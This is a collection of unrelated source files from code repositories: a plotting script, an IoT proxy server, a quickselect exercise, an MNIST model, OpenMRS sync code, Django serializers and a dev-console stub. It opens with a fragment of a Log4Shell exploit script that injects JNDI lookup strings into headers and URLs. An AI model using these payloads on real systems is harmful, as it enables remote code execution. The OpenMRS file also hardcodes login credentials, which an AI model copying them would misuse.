'User-Agent': '${jndi:' + protocol + '://10.10.0.1:443/a}',
}
request = url + "/${jndi:" + protocol + "://20.20.0.1:443/a}/?pwn=$\{jndi:" + protocol + "://30.30.0.1:443/a\}'"
print(requests.get(request, headers=headers).text)
if __name__ == '__main__':
url = input()
make_requests(url)
| Sekuloski/Log4j-python | main.py | main.py | py | 466 | python | en | code | 0 | github-code | 13 |
40710010990 | ### IMPORTS
import sys
import matplotlib.pyplot as plt
### MAIN
for q in range(len(sys.argv)-1) :
filename = sys.argv[q+1]
file = open(filename, "r")
lines = file.readlines()
times = []
mFlowRates = [0]
i = 0
time = 0
for line in lines :
if "Time =" in line and not "ExecutionTime" in line :
time = float(line.split()[2])
if "faceZone massFlowSurface_z1 massFlow" in line :
mFlowRate = float(line.split()[4])
mFlowRates.append(mFlowRate)
times.append(time)
t0 = times[0]
for i in range(len(times)) :
times[i] = times[i] - t0
del mFlowRates[-1]
plt.figure()
plt.plot(times, mFlowRates)
plt.xlabel("iteration")
plt.ylabel("Mass flow rate")
plt.grid()
plt.show()
| zdhughes91/GeN-Foam-Restructure | Tutorials/toBeUpdated/testingMod/plotMassFlowRate.py | plotMassFlowRate.py | py | 846 | python | en | code | 0 | github-code | 13 |
27789230829 | from socket import socket, AF_INET, SOCK_STREAM
from uuid import getnode
from ast import literal_eval
import time
import sys
#Registers device onto the server using device's id and MAC address
def REGISTER( deviceID, MAC, IP, port ):
print ("Device attempting to register to server, input values:")
print ("DeviceID: ", deviceID, "MAC: ", MAC, "IP: ", IP, "Port: ", port)
if not deviceTable: # registers device automatically if there are no current devices registered
registerTime = time.time()- startTime # gets the current elapsed time of the program
myList = [deviceID, MAC, IP, port, registerTime] # device info to be added to list of registered devices
deviceTable.append(myList) # adds device to list of registered devices
mailBox.append([]) # adds a list in the mailbox to add mail to for the device that was registered
print ("Device registered successfully", "\n")
ACK(1,1, deviceID, 0, 0) # ACK that device registered successfully
else:
for index in range(len(deviceTable)): # loops through table of registered devices to check for duplicates or errors
if(sorted(deviceTable[index][1]) == sorted(MAC)): # looks for duplicate MAC addresses
if(sorted(deviceTable[index][0]) == sorted(deviceID)): # looks to see if both MAC and deviceID in table are the same as input
registerTime = deviceTable[index][4] # time that the device was registered in table of devices
mailCount = len(mailBox[index]) # count of messages that are in the mailbox for he specified device
print("Device is already registered", "\n")
ACK(1,2,deviceID, registerTime, mailCount) # ACK that device is already registered
else: # Triggers if MAC address inputted is registered to another device
print("Device is already registered with same MAC, different device ID", "\n")
NACK(1,deviceTable[index][0],MAC) # NACK that such a registered entry exists as triggered above
return
elif(sorted(deviceTable[index][0]) == sorted(deviceID)): #looks for duplicate device IDs
if(sorted(deviceTable[index][1]) == sorted(MAC)): # looks to see if both MAC and deviceID in table are the same as input
registerTime = deviceTable[index][4] # time that the device was registered in table of devices
mailCount = len(mailBox[index]) # count of messages that are in the mailbox for he specified device
print("Device is already registered", "\n")
ACK(1,2,deviceID, registerTime, mailCount) # ACK that device is already registered
else: # Triggers if MAC address inputted is registered to another device
print("Device is already registered with same device ID, different MAC address", "\n")
NACK(1,deviceID,deviceTable[index][1]) # NACK that such a registered entry exists as triggered above
return
#Registers device since there were no duplicate MAC addresses or device IDs
registerTime = time.time()- startTime # gets the current elapsed time of the program
myList = [deviceID, MAC, IP, port, registerTime] # device info to be added to list of registered devices
deviceTable.append(myList) # adds device to list of registered devices
mailBox.append([]) # adds a list in the mailbo to add mail to for the device that was registered
print ("Device registered successfully", "\n")
ACK(1,1, deviceID, 0, 0) # ACK that device registered successfully
return
#Deregisters device from server's stored registry
def DEREGISTER( deviceID, MAC ):
print("Device attempting to deregister, device ID: ", deviceID, " MAC: ", MAC)
TableSize = len(deviceTable)
if(TableSize is 0):
print("Device failed to deregister", "\n")
NACK(1,deviceID, MAC)
return
for index in range(TableSize): # loops through table of registered devices to check if device is registered
if(sorted(deviceTable[index][1]) == sorted(MAC)): # looks for duplicate MAC addresses
if(sorted(deviceTable[index][0]) == sorted(deviceID)): # looks to see if both MAC and device ID in table are the same as input
deviceTable.remove(deviceTable[index]) # removes entry in table of registered devices for given device deregistering
print("Device Deregistered, DeviceID: ", deviceID, " MAC: ", MAC,"\n")
ACK(1,1,deviceID, 0, 0) # ACK that device was deregistered successfully
else:
print("Device failed to deregister","\n")
NACK(1,deviceTable[index][0],MAC) # NACK that device failed to deregister
return
elif(sorted(deviceTable[index][0]) == sorted(deviceID)): # looks for duplicate device IDs
if(sorted(deviceTable[index][1]) == sorted(MAC)): # looks to see if both MAC and device ID in table are the same as input
deviceTable.remove(deviceTable[index]) # removes entry in table of registered devices for given device deregistering
print("Device Deregistered, DeviceID: ", deviceID, " MAC: ", MAC,"\n")
ACK(2,0,deviceID,0,0) # ACK that device was deregistered successfully
else:
print("Device failed to deregister","\n")
NACK(2,deviceID,deviceTable[index][1]) # NACK that device failed to deregister
return
#Stores mail between clients in the proxy network
def MSG( fromID, toID, message, time ):
print("Server attempting to send a message from: ", fromID, " to: ", toID)
for index in range(len(deviceTable)): # loops through table of registered devices
if(sorted(deviceTable[index][0]) == sorted(toID)):# checks to see if dest device ID is registered with server
mailBox[index].append([message, time]) # adds message to the mailbox for given dest device ID
print("Message added by server to the mailbox successfully", "\n")
ACK(3,0,fromID, 0, 0) # ACK that message was added to mailbox successfully
return
print("Destination device ID was not found by server", "\n")
NACK(3,fromID,0) # NACK that device failed to add message to mailbox, meaning it could not find it in table of registered devices
#Retrieves information stored in the server for client devices
def QUERY(queryType, deviceID):
if queryType is 1: # query is to obtain info on another registered device
print("Server attempting to query for info on device ID: ", deviceID)
for index in range(len(deviceTable)): # loops through table of registered devices
if(sorted(deviceTable[index][0]) == sorted(deviceID)): # looks to find index of mailbox/table of registered devices
deviceFound = (0, deviceTable[index][2], deviceTable[index][3]) # Info of device client queried for
deviceFound = str(deviceFound) # tuple to str
deviceFound = str.encode(deviceFound) # str to bytes
print("Server successfully sent info on queried device", "\n")
sock.send(deviceFound) # send message to client
return
print("Server couldn't find the device being queried", "\n")
NACK(4, deviceID, 0) # NACK that querying device wasn't found in table of registered devices
if queryType is 2: # query is to obtain mail in mailbox for own device
print("Server attempting to query for deviceID: ", deviceID, " mail")
for index in range(len(deviceTable)): # loops through table of registered devices
if(sorted(deviceTable[index][0]) == sorted(deviceID)): # looks to find device being queried for in table of registered devices
userMail = (0, mailBox[index]) # Info needed to deliver mail to client
userMail = str(userMail)
userMail = str.encode(userMail)
print("Server sending mail to client")
sock.send(userMail) # send message to client
data = sock.recv(1024) # waits for confirmation that mail was sent correctly
mailBox[index] = [] # empties mailbox of mail that was just sent
print("Server successfully sent mail, deleting the sent mail from mailbox", "\n")
return
print("Server couldn't find the device being queried", "\n")
NACK(4, deviceID, 0) # NACK that querying device wasn't found in table of registered devices
#Tells client that a operation was not successful
def NACK(code, deviceID, MAC):
if code is 1: # code of 1 means register ACK
myReply = str((1, deviceID, MAC))
byteReply = str.encode(myReply)
sock.send(byteReply) # send message to client
if code is 2: # code of 2 means deregister ACK
myReply = str((1, deviceID, MAC))
byteReply = str.encode(myReply)
sock.send(byteReply) # send message to client
if code is 3: # code of 3 means MSG NACK
myReply = str((1, deviceID))
byteReply = str.encode(myReply)
sock.send(byteReply) # send message to client
if code is 4: # code of 4 means query NACK
myReply = str((1, deviceID))
byteReply = str.encode(myReply)
sock.send(byteReply) # send message to client
#Tells client that operation was successfull
def ACK( code, flag, deviceID, time, count):
if code is 1 and flag is 1: # code of 1 means register ACK, flag of 1 means new device registered
myReply = str((0, flag, deviceID))
byteReply = str.encode(myReply)
sock.send(byteReply) # send message to client
if code is 1 and flag is 2: # code of 1 means register ACK, flag of 2 means device was already registered
myReply = str((0, flag, deviceID, time, count))
byteReply = str.encode(myReply)
sock.send(byteReply) # send message to client
if code is 2: # code of 2 means deregister ACK
myReply = str((0, deviceID))
byteReply = str.encode(myReply)
sock.send(byteReply) # send message to client
if code is 3: # code of 3 means MSG ACK
myReply = str((0, deviceID))
byteReply = str.encode(myReply)
sock.send(byteReply) # send message to client
#Server Setup Code
portNumber = 9999 # port number for server TCP socket
s = socket(AF_INET, SOCK_STREAM) # initializing new socket
s.bind(('192.168.56.1', portNumber)) # binding server's IP and desired port number to socket
oldStdout = sys.stdout # save old printing setting
logFile1 = open("Activity2.log","w") # open activity log
logFile2 = open("Error2.log","w") # open error log
sys.stdout = logFile1 # change so print prints to desired file instead of console
print("Server side activity", "\n")
startTime = time.time() # gets starting time of the program
deviceTable = [] # initializes table used to store information of registered devices
mailBox = [] # initializes table used to store the mail of clients
s.listen(5) #5 max queued
sock, addr = s.accept() # accepts a connection to the socket
OPEN = True # initial value is true, meaning more packets can be sent by the client to server
while OPEN is True: # OPEN remains true until client quits his connection
data = sock.recv(1024) # waits to recv data from client
data = bytes.decode(data)
data = literal_eval(data)
if data[0] is 1: # 0 is position of code, code of 1 means register message
REGISTER(data[1], data[2] , addr[0] , addr[1])
elif data[0] is 2: # 0 is position of code, code of 1 means deregister message
DEREGISTER(data[1], data[2])
elif data[0] is 3: # 0 is position of code, code of 3 means mail message
MSG( data[1], data[2], data[3], time.time() - startTime )
elif data[0] is 4: # 0 is position of code, code of 4 means query message
QUERY( data[1], data[2] )
elif data[0] is 5: # 0 is position of code, code of 5 means quit message
OPEN = False
print("Connected device: ", data[1], " is leaving network", "\n")
else:
sys.stdout = logFile2 # switches to printing to error log
print("malform packet detected from IP: ", addr[0])
sys.stdout = logFile1 # switches back to printing to activity log
sys.stdout = oldStdout # change back to normal printing
logFile1.close() # close activity log file
logFile2.close() # close error log file
| MatthewCookUNR/CPE-401-IoT-Proxy-Network-2017 | IoT Proxy/Server-Side Program.py | Server-Side Program.py | py | 12,597 | python | en | code | 0 | github-code | 13 |
28989810024 | '''
https://leetcode.com/problems/kth-largest-element-in-an-array/
'''
def quickSelect(nums,beg,end):
if beg < end:
p = partition(nums,beg,end)
if p == k:
return nums[k]
elif p < k:
return quickSelect(nums,p+1,end)
return quickSelect(nums,beg,p-1)
return nums[k]
def partition(nums,beg,end):
p = beg
pivot = nums[p]
while beg < end:
while beg < len(nums) and nums[beg] >= pivot:
beg += 1
while nums[end] < pivot:
end -= 1
if beg < end:
nums[beg],nums[end] = nums[end],nums[beg]
nums[p],nums[end] = nums[end],nums[p]
return end
nums = [3,2,3,1,2,4,5,5,6]
k = 4
k = k-1
print(quickSelect(nums,0,len(nums)-1)) | riddheshSajwan/data_structures_algorithm | sorting/quickSelect.py | quickSelect.py | py | 758 | python | en | code | 1 | github-code | 13 |
8488144393 | import datetime
from allauth.account import app_settings as allauth_settings
from allauth.account.adapter import get_adapter
from allauth.utils import email_address_exists
from django.contrib.auth import get_user_model
from django.core.exceptions import ObjectDoesNotExist
from django.db.models import Count, Q
from phonenumber_field.serializerfields import PhoneNumberField
from rest_auth.registration.serializers import RegisterSerializer
from rest_auth.serializers import LoginSerializer as DefaultLoginSerializer
from rest_framework import serializers
from rest_framework_simplejwt.serializers import TokenRefreshSerializer as DefaultTokenRefreshSerializer
from rest_framework_simplejwt.tokens import RefreshToken
from movies.models import Movie, Rating, MovieLike
from movies.serializers import MovieTimelineSerializer
from reservations.models import Reservation
from utils.custom_functions import reformat_duration, check_google_oauth_api
from utils.excepts import (
UsernameDuplicateException, TakenEmailException, GoogleUniqueIdDuplicatesException,
UnidentifiedUniqueIdException, LoginFailException, SocialSignUpUsernameFieldException
)
from .models import Profile
Member = get_user_model()
class SignUpSerializer(RegisterSerializer):
name = serializers.CharField()
email = serializers.EmailField()
mobile = PhoneNumberField()
birth_date = serializers.DateField()
def validate_email(self, email):
email = get_adapter().clean_email(email)
if allauth_settings.UNIQUE_EMAIL:
if email and email_address_exists(email):
raise TakenEmailException
return email
def validate_username(self, username):
try:
Member.objects.get(username=username)
raise UsernameDuplicateException
except ObjectDoesNotExist:
return username
def save(self, request):
self.is_valid()
validated_data = self.validated_data
member = Member.objects.create(
username=validated_data['username'],
name=validated_data['name'],
email=validated_data['email'],
birth_date=validated_data['birth_date'],
mobile=validated_data['mobile']
)
member.set_password(validated_data.pop('password1'))
member.save()
return member
class SocialSignUpSerializer(SignUpSerializer):
password1, password2 = None, None
unique_id = serializers.CharField(required=True, write_only=True)
def validate_unique_id(self, unique_id):
try:
Member.objects.get(unique_id=unique_id)
raise GoogleUniqueIdDuplicatesException
except ObjectDoesNotExist:
return unique_id
def validate(self, data):
if data['username'] != data['email']:
raise SocialSignUpUsernameFieldException
return data
def save(self, request):
self.is_valid()
validated_data = self.validated_data
member = Member.objects.create(
username=validated_data['username'],
name=validated_data['name'],
email=validated_data['email'],
birth_date=validated_data['birth_date'],
mobile=validated_data['mobile'],
unique_id=validated_data['unique_id'],
)
member.set_password(validated_data['unique_id'])
member.save()
return member
class JWTSerializer(serializers.Serializer):
refresh = serializers.SerializerMethodField()
access = serializers.SerializerMethodField()
id = serializers.IntegerField(source='user.id')
username = serializers.CharField(source='user.username')
name = serializers.CharField(source='user.name')
email = serializers.EmailField(source='user.email')
birth_date = serializers.DateField(source='user.birth_date')
mobile = PhoneNumberField(source='user.mobile')
@classmethod
def get_token(cls, user):
return RefreshToken.for_user(user)
def get_refresh(self, obj):
return str(self.get_token(obj['user']))
def get_access(self, obj):
return str(self.get_token(obj['user']).access_token)
# for Documentation
class CheckUsernameDuplicateSerializer(serializers.Serializer):
username = serializers.CharField()
class LoginSerializer(DefaultLoginSerializer):
email = None
username = serializers.CharField(required=True)
class SocialLoginSerializer(DefaultLoginSerializer):
email = None
username = serializers.CharField(required=True)
google_id_token = serializers.CharField(required=True, write_only=True)
def validate(self, data):
username = data['username']
password = data['password']
google_id_token = data['google_id_token']
user = self.authenticate(username=username, password=password)
if user is None:
raise LoginFailException
unique_id = check_google_oauth_api(google_id_token)
if user.unique_id != unique_id:
raise UnidentifiedUniqueIdException
data['user'] = user
return data
class TokenRefreshResultSerializer(serializers.Serializer):
access = serializers.CharField()
class TokenRefreshSerializer(DefaultTokenRefreshSerializer):
def to_representation(self, instance):
return TokenRefreshResultSerializer(instance).data
class ProfileDetailSerializer(serializers.ModelSerializer):
regions = serializers.SerializerMethodField('get_regions')
genres = serializers.SerializerMethodField('get_genres')
class Meta:
model = Profile
fields = [
'id',
'tier',
'point',
'regions',
'genres',
'time',
'is_disabled',
]
def get_regions(self, profile):
return [region.name for region in profile.regions.all()]
def get_genres(self, profile):
return [genre.name for genre in profile.genres.all()]
class MemberDetailSerializer(serializers.ModelSerializer):
profile = ProfileDetailSerializer()
reserved_movies_count = serializers.SerializerMethodField('get_reserved_movies_count')
watched_movies_count = serializers.SerializerMethodField('get_watched_movies_count')
like_movies_count = serializers.SerializerMethodField('get_like_movies_count')
rating_movies_count = serializers.SerializerMethodField('get_rating_movies_count')
class Meta:
model = Member
fields = [
'id',
'email',
'name',
'mobile',
'birth_date',
'profile',
'reserved_movies_count',
'watched_movies_count',
'like_movies_count',
'rating_movies_count',
]
def get_reserved_movies_count(self, member):
return Movie.objects.filter(
schedules__reservations__member=member,
schedules__reservations__payment__isnull=False,
schedules__reservations__payment__is_canceled=False,
schedules__start_time__gt=datetime.datetime.today()
).count()
def get_watched_movies_count(self, member):
return Movie.objects.filter(
schedules__reservations__member=member,
schedules__reservations__payment__isnull=False,
schedules__reservations__payment__is_canceled=False,
schedules__start_time__lte=datetime.datetime.today()
).count()
def get_like_movies_count(self, member):
return Movie.objects.filter(
like_members__pk=member.pk,
movie_likes__liked=True
).count()
def get_rating_movies_count(self, member):
return Rating.objects.filter(
member=member
).count()
class LikeMoviesSerializer(serializers.ModelSerializer):
movie_id = serializers.IntegerField(source='movie.id')
movie_name = serializers.CharField(source='movie.name_kor')
poster = serializers.ImageField(source='movie.poster')
grade = serializers.CharField(source='movie.grade')
acc_favorite = serializers.SerializerMethodField('get_acc_favorite')
open_date = serializers.DateField(source='movie.open_date', format='%Y-%m-%d')
running_time = serializers.SerializerMethodField('get_running_time')
directors = serializers.SerializerMethodField('get_directors')
genres = serializers.SerializerMethodField('get_genres')
liked_at = serializers.DateField(format='%Y-%m-%d')
class Meta:
model = MovieLike
fields = [
'movie_id',
'movie_name',
'poster',
'grade',
'acc_favorite',
'open_date',
'running_time',
'directors',
'genres',
'liked_at',
]
def get_acc_favorite(self, movielike):
likes_count = movielike.movie.movie_likes.filter(liked=True).count()
result = likes_count + 689 - (movielike.movie.pk * 24)
return result if result >= 0 else likes_count + 11
def get_running_time(self, movielike):
return reformat_duration(movielike.movie.running_time)
def get_directors(self, movielike):
return movielike.movie.directors.values_list('name', flat=True)
def get_genres(self, movielike):
return movielike.movie.genres.values_list('name', flat=True)
class WatchedMoviesSerializer(serializers.ModelSerializer):
payment_id = serializers.IntegerField(source='payment.id')
reservation_code = serializers.CharField(source='payment.code')
price = serializers.IntegerField(source='payment.price')
discount_price = serializers.IntegerField(source='payment.discount_price')
screen_type = serializers.CharField(source='schedule.screen.screen_type')
screen_name = serializers.CharField(source='schedule.screen.name')
seat_grade = serializers.SerializerMethodField('get_seat_grade')
seat_name = serializers.SerializerMethodField('get_seat_name')
theater_name = serializers.CharField(source='schedule.screen.theater.name')
theater_region = serializers.CharField(source='schedule.screen.theater.region.name')
start_time = serializers.DateTimeField(source='schedule.start_time', format='%Y-%m-%d %H:%M')
payed_at = serializers.DateTimeField(source='payment.payed_at', format='%Y-%m-%d')
movie = MovieTimelineSerializer(source='schedule.movie')
class Meta:
model = Reservation
fields = [
'payment_id',
'reservation_code',
'price',
'discount_price',
'screen_type',
'screen_name',
'seat_grade',
'seat_name',
'theater_name',
'theater_region',
'start_time',
'payed_at',
'movie',
]
def get_seat_grade(self, reservation):
return reservation.seat_grades.annotate(
adult=Count('grade', filter=Q(grade='adult')),
teen=Count('grade', filter=Q(grade='teen')),
preferential=Count('grade', filter=Q(grade='preferential'))
).values('adult', 'teen', 'preferential')
def get_seat_name(self, reservation):
return reservation.seats.values_list('name', flat=True)
def get_acc_favorite(self, reservation):
likes_count = reservation.schedule.movie.movie_likes.filter(liked=True).count()
result = likes_count + 689 - (reservation.schedule.movie.pk * 24)
return result if result >= 0 else likes_count + 11
def get_running_time(self, obj):
return reformat_duration(obj.schedule.movie.running_time)
def get_directors(self, reservation):
return [director.name for director in reservation.schedule.movie.directors.all()]
def get_genres(self, reservation):
return [genre.name for genre in reservation.schedule.movie.genres.all()]
class RatingMoviesSerializer(serializers.ModelSerializer):
rating_id = serializers.IntegerField(source='id')
movie_name = serializers.CharField(source='movie.name_kor')
poster = serializers.ImageField(source='movie.poster')
class Meta:
model = Rating
fields = [
'rating_id',
'movie_name',
'poster',
'created_at',
'score',
'key_point',
'comment',
]
class ReservedMoviesSerializer(serializers.ModelSerializer):
reservation_id = serializers.IntegerField(source='id')
reservation_code = serializers.CharField(source='payment.code')
price = serializers.IntegerField(source='payment.price')
discount_price = serializers.IntegerField(source='payment.discount_price')
movie_name = serializers.CharField(source='schedule.movie.name_kor')
poster = serializers.ImageField(source='schedule.movie.poster')
screen_type = serializers.CharField(source='schedule.screen.screen_type')
screen_name = serializers.CharField(source='schedule.screen.name')
theater_name = serializers.CharField(source='schedule.screen.theater.name')
start_time = serializers.DateTimeField(source='schedule.start_time', format='%Y-%m-%d %H:%M')
payed_at = serializers.DateTimeField(source='payment.payed_at', format='%Y-%m-%d %H:%M')
payment_id = serializers.IntegerField(source='payment.pk')
receipt_id = serializers.CharField(source='payment.receipt_id')
seat_grade = serializers.SerializerMethodField('get_seat_grade')
seat_name = serializers.SerializerMethodField('get_seat_name')
saving_point = serializers.SerializerMethodField('get_saving_point')
class Meta:
model = Reservation
fields = [
'reservation_id',
'reservation_code',
'price',
'discount_price',
'movie_name',
'poster',
'screen_type',
'screen_name',
'theater_name',
'start_time',
'seat_grade',
'seat_name',
'payed_at',
'payment_id',
'receipt_id',
'saving_point',
]
def get_seat_grade(self, reservation):
return reservation.seat_grades.annotate(
adult=Count('grade', filter=Q(grade='adult')),
teen=Count('grade', filter=Q(grade='teen')),
preferential=Count('grade', filter=Q(grade='preferential'))
).values('adult', 'teen', 'preferential')
def get_seat_name(self, reservation):
return reservation.seats.values_list('name', flat=True)
def get_saving_point(self, reservation):
if reservation.member.profile.tier == 'basic':
discount_rate = 0.01
else:
discount_rate = 0.02
# Payment.discount_price null=True, blank=True 빼고 default=0 하는 방안
if not reservation.payment.discount_price:
discount_price = 0
else:
discount_price = reservation.payment.discount_price
return round((reservation.payment.price - discount_price) * discount_rate)
class CanceledReservationMoviesSerializer(serializers.ModelSerializer):
reservation_id = serializers.IntegerField(source='id')
canceled_at = serializers.DateTimeField(source='payment.canceled_at', format='%Y-%m-%d %H:%M')
movie_name = serializers.CharField(source='schedule.movie.name_kor')
theater_name = serializers.CharField(source='schedule.screen.theater.name')
start_time = serializers.DateTimeField(source='schedule.start_time', format='%Y-%m-%d %H:%M')
canceled_payment = serializers.IntegerField(source='payment.price')
canceled_discount_price = serializers.IntegerField(source='payment.discount_price')
class Meta:
model = Reservation
fields = [
'reservation_id',
'canceled_at',
'movie_name',
'theater_name',
'start_time',
'canceled_payment',
'canceled_discount_price',
]
| OmegaBox/OmegaBox_Server | app/members/serializers.py | serializers.py | py | 15,939 | python | en | code | 1 | github-code | 13 |
74175598738 | #!/usr/bin/env python3
from common.util import load, test, change_dir, parse_nums
def solve(part, file, lo=0, hi=0):
ranges = sorted(parse_nums(line) for line in load(file))
res = 0
for x, y in ranges:
if lo + 1 <= x - 1:
if part == 1:
return lo+1
res += x - lo - 1
lo = max(lo, y)
return res + hi - lo
### THE REST IS TESTS ###
if __name__ == "__main__":
change_dir(__file__)
test(3, solve(part=1, hi=9, file='input-test-1'))
test(19449262, solve(part=1, hi=4294967295, file='input-real'))
test(2, solve(part=2, hi=9, file='input-test-1'))
test(119, solve(part=2, hi=4294967295, file='input-real'))
| andrewmacheret/aoc | 2016/python/day20/main.py | main.py | py | 654 | python | en | code | 0 | github-code | 13 |
21308439710 | # my first base fashion-MNIST
import keras
import tensorflow as tf
import numpy as np
from keras.datasets import fashion_mnist
np.random.seed(1)
tf.set_random_seed(1)
(train_images, train_labels), (test_images, test_labels) = fashion_mnist.load_data()
type(train_images)
train_images = train_images / 255.0
test_images = test_images / 255.0
class_names = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat',
'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']
model = keras.Sequential([
keras.layers.Flatten(input_shape=(28, 28)),
keras.layers.Dense(64, activation=tf.nn.relu),
keras.layers.Dense(64, activation=tf.nn.softmax)
])
model.compile(optimizer='adam',
loss='sparse_categorical_crossentropy',
metrics=['accuracy'])
model.fit(train_images, train_labels, epochs=100)
test_loss, test_acc = model.evaluate(test_images, test_labels)
print('Test accuracy:', test_acc)
| guchchcug/fashion-mnisit-base | fashion-MNIST.py | fashion-MNIST.py | py | 937 | python | en | code | 0 | github-code | 13 |
17945600663 | import requests
from datetime import datetime, timedelta, date
from openmrs.models import Paciente, Location, ConsultaClinica
# location_url = 'http://197.218.241.174:8080/openmrs/ws/rest/v1/reportingrest/dataSet/5cd2ea5b-b11f-454b-9b45-7a78ac33eab9'
# inscritos_url = 'http://197.218.241.174:8080/openmrs/ws/rest/v1/reportingrest/dataSet/e386ec30-689b-4e43-b6fc-587bac266ea4'
class PullOpenmrsData:
URL_BASE = 'http://197.218.241.174:8080/openmrs/ws/rest/v1/reportingrest/dataSet/'
def get_locations(self, uuid):
url = PullOpenmrsData.URL_BASE + uuid
try:
response = requests.get(url, auth=('xavier.nhagumbe', 'Goabtgo1'))
locations_list = response.json()['rows']
return locations_list
except requests.exceptions.RequestException as err:
print(err)
def get_patients(self, uuid, params: dict):
url = PullOpenmrsData.URL_BASE + uuid
try:
response = requests.get(url, params=params, auth=(
'xavier.nhagumbe', 'Goabtgo1'))
patient_list = response.json()['rows']
return patient_list
except requests.exceptions.RequestException as err:
print(err)
class AddDataToMiddleware:
def add_locations(self):
data_list = PullOpenmrsData().get_locations(
'5cd2ea5b-b11f-454b-9b45-7a78ac33eab9')
print(data_list)
if data_list is not None:
for data in data_list:
location, created = Location.objects.get_or_create(
location_id=data['location_id'],
codigo=data['codigo'],
name=data['NAME'],
description=data['description'],
state_province=data['state_province'],
country=data['country'],
parent_location=data['parent_location']
)
location.save()
else:
print('No records!')
def add_patient(self):
params = {
'startDate': '1900-01-01',
'endDate': '2021-11-10'
}
patients = PullOpenmrsData().get_patients(
'e386ec30-689b-4e43-b6fc-587bac266ea4', params)
print(patients)
if patients is not None:
for data in patients:
paciente, created = Paciente.objects.get_or_create(
patient_id=data['patient_uuid'],
nid=data['NID'],
nome=data['NomeCompleto'],
genero=data['gender'],
data_nascimento=datetime.fromtimestamp(
data['data_nascimento'] / 1e3),
telefone=data['telefone'],
distrito=data['Distrito'],
posto_administrativo=data['PAdministrativo'],
localidade=data['Localidade'],
bairro=data['Bairro'],
ponto_referencia=data['PontoReferencia']
)
paciente.save()
else:
print('No records!')
# patient_id = models.CharField(max_length=500, primary_key=True)
# nid = models.CharField(max_length=255)
# nome = models.CharField(max_length=255)
# genero = models.CharField(max_length=20)
# data_nascimento = models.DateTimeField()
# telefone = models.CharField(max_length=100, blank=True, null=True)
# profissao = models.CharField(max_length=100, blank=True, null=True)
# livro = models.CharField(max_length=15, blank=True, null=True)
# pagina = models.CharField(max_length=4, blank=True, null=True)
# linha = models.CharField(max_length=4, blank=True, null=True)
# nome_confidente = models.CharField(max_length=255, blank=True, null=True)
# confidente_parentesco = models.CharField(
# max_length=255, blank=True, null=True)
# telefone1_confidente = models.CharField(
# max_length=255, blank=True, null=True)
# telefone2_confidente = models.CharField(
# max_length=255, blank=True, null=True)
# endereco_confidente = models.CharField(
# max_length=500, null=True, blank=True)
# distrito = models.CharField(max_length=100, null=True, blank=True)
# posto_administrativo = models.CharField(
# max_length=100, null=True, blank=True)
# localidade = models.CharField(max_length=100, null=True, blank=True)
# bairro = models.CharField(max_length=100, null=True, blank=True)
# ponto_referencia = models.CharField(max_length=100, null=True, blank=True)
# "valor_estadio": "I",
# "location": "5a04df3e-692f-4cc8-8abe-3807ffd0c5bd",
# "transferido_de": null,
# "data_inscricao_programa": null,
# "gender": "F",
# "PontoReferencia": null,
# "data_aceita": null,
# "dead": false,
# "NomeCompleto": "Joana Alberto Alberto",
# "Distrito": "Chiuta",
# "inscrito_programa": "NAO",
# "death_date": null,
# "PAdministrativo": "Manje",
# "data_abertura": 1612821600000,
# "data_inicio": 1325628000000,
# "data_nascimento": "1999-01-01",
# "data_estadio": 1630274400000,
# "referencia": null,
# "data_transferido_de": null,
# "data_seguimento": 1630274400000,
# "telefone": null,
# "Localidade": "Manje-sede",
# "patient_uuid": "bf3f9bf1-b274-412f-aab6-f691b5a22ce3",
# "patient_id": 9371,
# "Bairro": null,
# "data_diagnostico": null,
# "NID": "0105060801/2008/00012"
| fxavier/echosys | app/openmrs/services/data_service.py | data_service.py | py | 5,540 | python | en | code | 0 | github-code | 13 |
4593694305 | class Solution:
"""
@param nums: A list of integers
@return: An integer indicate the value of maximum difference between two
Subarrays
"""
def maxDiffSubArrays(self, nums):
# write your code here
if len(nums) == 0:
return 0
maxL = [nums[0]] * len(nums)
curMaxL = nums[0]
minL = [nums[0]] * len(nums)
curMinL = nums[0]
maxR = [nums[-1]] * len(nums)
curMaxR = nums[-1]
minR = [nums[-1]] * len(nums)
curMinR = nums[-1]
for i in range(1, len(nums)):
r = len(nums) - 1 - i
curMaxL = max(curMaxL + nums[i], nums[i])
maxL[i] = max(maxL[i - 1], curMaxL)
curMinL = min(curMinL + nums[i], nums[i])
minL[i] = min(minL[i - 1], curMinL)
curMaxR = max(curMaxR + nums[r], nums[r])
maxR[r] = max(maxR[r + 1], curMaxR)
curMinR = min(curMinR + nums[r], nums[r])
minR[r] = min(minR[r + 1], curMinR)
ret = 0
for i in range(len(nums) - 1):
t1 = abs(maxL[i] - minR[i + 1])
t2 = abs(maxR[i + 1] - minL[i])
ret = max(t1, t2, ret)
return ret | ultimate010/codes_and_notes | 45_maximum-subarray-difference/maximum-subarray-difference.py | maximum-subarray-difference.py | py | 1,256 | python | en | code | 0 | github-code | 13 |
4904155281 | ##~~~~~~~~~~~~~~~~-~~~~~~~~~~~~~~~~~##
# DevConsole for cheats and testing
##~~~~~~~~~~~~~~~~-~~~~~~~~~~~~~~~~~##
# Possible commands TODO :
# ### Dev
# # - dev_gamelog #-// {Bool} #-// Enable/Disable game event log print
# ### Cheats
# # - game_ball_add #-// No param #-// Add a new ball
# # - game_ball_remove #-// No param #-// Remove the last ball
# # - game_reset #-// No param #-// Reset the game
# # - game_ball_retrace #-// {Bool} #-// Enable/Disable Ball raytrace
# # - game_pad_size #-// {Pad id} {Size} #-// Change pad size
##~~~~~~~~~~~~~~~~-~~~~~~~~~~~~~~~~~##
# Functionnalities TODO :
# ### Isolated part
# # - [X] devconsole.py existence
# # - [X] Read input
# # - [X] Treat the input and print result
# # - [X] User command log
# ### Combined with PongPython game
# # - [X] In-game window
# # - [X] Window appearance based on a button press (maybe TAB key)
# # - [X] Typing box
# # - [/] In-game support of all the commands
# # - [ ] Game event log
# # - [CANCELLED] Scrollable log
#____________________________________#
##~~~~~~~~~~~~~~~~-~~~~~~~~~~~~~~~~~##
# CODE BEGIN
##~~~~~~~~~~~~~~~~-~~~~~~~~~~~~~~~~~##
# IMPORT
#
""" DEPRECATED
import sys
"""
##~~~~~~~~~~~~~~~~-~~~~~~~~~~~~~~~~~##
# MACROS
#
SKIP = 0
DEV_GAMELOG = 1
GAME_BALL_ADD = 2
GAME_BALL_REMOVE = 3
GAME_RESET = 4
GAME_BALL_RAYTRACE = 5
GAME_BALL_SIZE = 6
